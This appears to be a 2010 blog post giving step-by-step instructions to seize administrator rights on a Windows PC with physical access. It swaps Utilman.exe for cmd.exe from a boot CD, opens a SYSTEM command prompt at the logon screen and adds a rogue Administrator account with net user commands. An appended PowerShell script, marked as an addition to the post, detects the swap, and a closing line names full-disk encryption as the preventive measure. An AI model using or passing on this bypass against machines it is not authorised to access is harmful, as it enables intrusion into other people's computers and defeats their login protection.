All you never wanted to know

Published 2010-01-28, last updated 2010-01-28

Gain Admin Access

To get access to a Windows PC as an Administrator user, there is a very crude security hole you can use. The only requirement: you need physical access to the machine.

The procedure is as follows:

  1. use a Linux boot CD (e.g. BackTrack 4 or the System Rescue CD) or a Windows installation disc (of the same version as the installed one!)
    • Linux Boot-CD: (there’s also a nice screencast over at
      1. if not already done, mount the Windows partition
      2. go to Windows/system32/
      3. rename the file Utilman.exe to Utilman.exe.bak and copy cmd.exe to Utilman.exe:

         # mv Utilman.exe Utilman.exe.bak
         # cp cmd.exe Utilman.exe
      4. reboot the machine into Windows
    • Windows Boot-CD:
      1. select your Windows version to “repair”
      2. if it asks whether you want to use System Rescue, say “No”
      3. after it has given up trying to repair your system, click the small link Advanced Recovery Options
      4. select Command Prompt
      5. now switch to your Windows drive (for me it was D:)
      6. do a cd \Windows\system32
      7. now rename the file Utilman.exe to Utilman.exe.bak and copy cmd.exe to Utilman.exe:

         D:\>ren Utilman.exe Utilman.exe.bak
         D:\>copy cmd.exe Utilman.exe
      8. reboot the machine into the regular Windows
  2. on the logon screen of Windows, press Win+U. This would normally open the Utility Manager (a.k.a. Utilman.exe), but now the Command Prompt should show up instead
  3. the prompt runs with SYSTEM rights, so you can easily add a new Administrator user:

     C:\>net user BadGuy GoodPassword /add
     C:\>net localgroup Administrators BadGuy /add

    This will add the user BadGuy with the password GoodPassword and make him a member of the Administrators group.

  4. Log in with the newly created user BadGuy
  5. Remember to delete the fake Utilman.exe and rename Utilman.exe.bak back to Utilman.exe
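For the other side of the coin: the swap above leaves a file that still carries cmd.exe's contents, version resource and hash, and a valid Authenticode signature (the signature covers the bytes, not the file name), so a signature check alone will not notice it. The following is an added example, not code from the original post; it assumes an elevated PowerShell 5.1 or later session on the machine being audited, and any file name passed besides Utilman.exe is the reader's own choice.

```powershell
# Added defender-side check for the Utilman.exe swap described above
# (not part of the original post). Run elevated on the machine to audit.
param([string[]]$Names = @('Utilman.exe'))

$system32 = Join-Path $env:SystemRoot 'System32'
$cmdHash  = (Get-FileHash -Path (Join-Path $system32 'cmd.exe') -Algorithm SHA256).Hash

foreach ($name in $Names) {
    $path = Join-Path $system32 $name
    if (-not (Test-Path $path)) {
        Write-Warning "$name is missing from System32"
        continue
    }

    $hash = (Get-FileHash -Path $path -Algorithm SHA256).Hash
    $info = (Get-Item $path).VersionInfo
    $sig  = Get-AuthenticodeSignature -FilePath $path

    # A copied cmd.exe keeps cmd.exe's hash and its OriginalFilename resource
    # ("Cmd.Exe"), while the Authenticode check still reports Valid because
    # the signature is over the contents, not the name. So compare the hash
    # to cmd.exe first, then the embedded original file name to the name on
    # disk (PowerShell -ne is case-insensitive), and only then the signature.
    if ($hash -eq $cmdHash) {
        Write-Warning "$name is byte-identical to cmd.exe: it has been swapped"
    } elseif ($info.OriginalFilename -and ($info.OriginalFilename -ne $name)) {
        Write-Warning "$name was built as '$($info.OriginalFilename)' ($($info.FileDescription))"
    } elseif ($sig.Status -ne 'Valid') {
        Write-Warning "$name Authenticode status: $($sig.Status)"
    } else {
        Write-Output "$name OK: $($info.FileDescription), signature $($sig.Status)"
    }

    # Step 5 above renames the backup back; a leftover .bak means cleanup was skipped.
    if (Test-Path "$path.bak") {
        Write-Warning "Leftover $name.bak found next to $name"
    }
}
```

Because the replacement is done offline, from a boot CD, the only thing that prevents it outright is full-disk encryption of the Windows volume (e.g. BitLocker); this script only tells you after the fact whether it happened.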